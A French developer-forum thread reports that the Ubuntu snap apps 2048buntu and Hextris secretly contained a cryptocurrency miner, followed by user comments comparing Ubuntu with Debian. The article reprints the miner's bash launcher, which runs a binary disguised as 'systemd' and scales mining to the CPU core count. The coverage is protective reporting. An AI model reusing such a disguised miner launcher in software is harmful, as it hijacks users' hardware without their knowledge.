Discussion :

[Patrick Ruiz]

Ubuntu snap store : des utilisateurs découvrent un logiciel malveillant logé dans des applications
Un mineur de monnaie cryptographique

L’époque où il fallait systématiquement lancer le terminal et taper un sudo pour installer une application est révolue dans l’univers de Linux. L’opération est grandement facilitée par la disponibilité de gestionnaires d’applications qui permettent la prise en charge d’une catégorie particulière de paquetage dénommée snaps. Un utilisateur attire l’attention de la communauté sur la potentielle présence de logiciels malveillants au sein du snap store de la distribution Linux maintenue par Canonical.

En fait il est question de bien faire comprendre que la facilité avec laquelle les snaps peuvent être installés s’accompagne d’un revers. Dans le cas d’espèce, l’utilisateur qui fait usage du pseudonyme tawirdur sur GitHub tire la sonnette d’alarme sur le fait que l’application peut ne pas être saine. À l’heure où les monnaies cryptographiques ont le vent en poupe, des développeurs veulent se faire de l’argent sur le dos des ressources matérielles des utilisateurs de snaps et ce, à leur insu. Tawirdur a détecté que le snap 2048buntu contient un mineur de monnaies cryptographiques.

D’après ce que rapporte le site spécialisé Linux Uprising, l’application Hextris est dans la même situation. Tawirdur a publié une copie du script d’initialisation du mineur de monnaie cryptographique au sein du snap 2048buntu.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

Des cas d’infections sur l’App Store ou sur le Play Store sont rapportés de temps à autre malgré le processus de revue ou les restrictions mises en place par Apple et Google. Retrouver un malware au sein d’une boutique d’applications ne relève donc pas du scoop. Seulement, l’aisance avec laquelle n’importe qui peut publier une application sur le snap store d’Ubuntu interpelle. Il n’y a qu’à jeter un œil à la documentation liée pour se rendre compte que le tour est joué en trois étapes toutes simples ; pas de mention du terme contrôle par l’équipe en charge de la boutique d’applications.

Il s’agit d’un problème quand on sait que certains snaps peuvent être publiés sous licence propriétaire pour compliquer la revue du code source à laquelle la communauté se livre de façon traditionnelle. Nicolas Tomb a publié le snap 2048buntu – un jeu développé par l’utilisateur qui fait usage du pseudonyme iirelu sur GitHub – sous licence MIT. La présence d’un mineur de cryptomonnaie en son sein peut donc bien être interprétée comme une intention manifeste de nuire.

L’équipe en charge de la boutique de snaps gère les signalements au fur et à mesure qu’ils sont remontés par les utilisateurs. À date, les snaps 2048buntu et Hextris sont écartés et les investigations se poursuivent.

Sources : linuxuprising, tawirdur, processus de publication d’un snap

Et vous ?

Qu’en pensez-vous ?

S’agit-il d’un incident isolé ? La brèche est-elle utilisée à grande échelle ?

Que faites-vous personnellement pour vous assurer assurer de ce que les snaps que vous décidez d’installer sont sains ?

Voir aussi :

Google Play Store : plus de 250 applications armées à l' « Alphonso », un logiciel qui analyse les contenus TV pour les annonceurs

Apple procède à un nettoyage de son App Store pour se débarrasser des applications affectées par le malware XcodeGhost

[Picarunix]

Ubuntu était une version améliorée de Debian.
Désormais, avec ce genre d'idée, c'est une version dégradée de Debian.

J'ai cru à un article du 1er avril ...

[hotcryx]

Depuis quand Ubuntu est une version "améliorée" de Debian?

C'est un fork et/ou inspiré de Debian, mais ce n'est pas pour autant que c'est meilleur.

[Steinvikel]

Ubuntu est "dérivé" de Debian qui était le projet source... la différence qui les distingues c'est en premier lieu leur but :
Debian > ce veut devenir un OS universel, et odieusement stable !
Ubuntu > ce veut être le plus facile d'utilisation possible.

Debian à qq exception près (comme certains drivers notamment) est totalement libre et exempt de "blob" propriétaires.
Ubuntu, lui, possède une base libre, mais y place quelques couches propriétaires (comme celle concernant la télémétrie si je ne m'abuse).
Ubuntu permet au néophyte d'utiliser Linux, mais lui permet aussi les pires dérives (quand ce n'est pas directement la distro).
Debian permet plus de possibilités sans les inconvénient... à condition d'avoir un bagage minimal... qui tend à être de plus en proche du néophyte.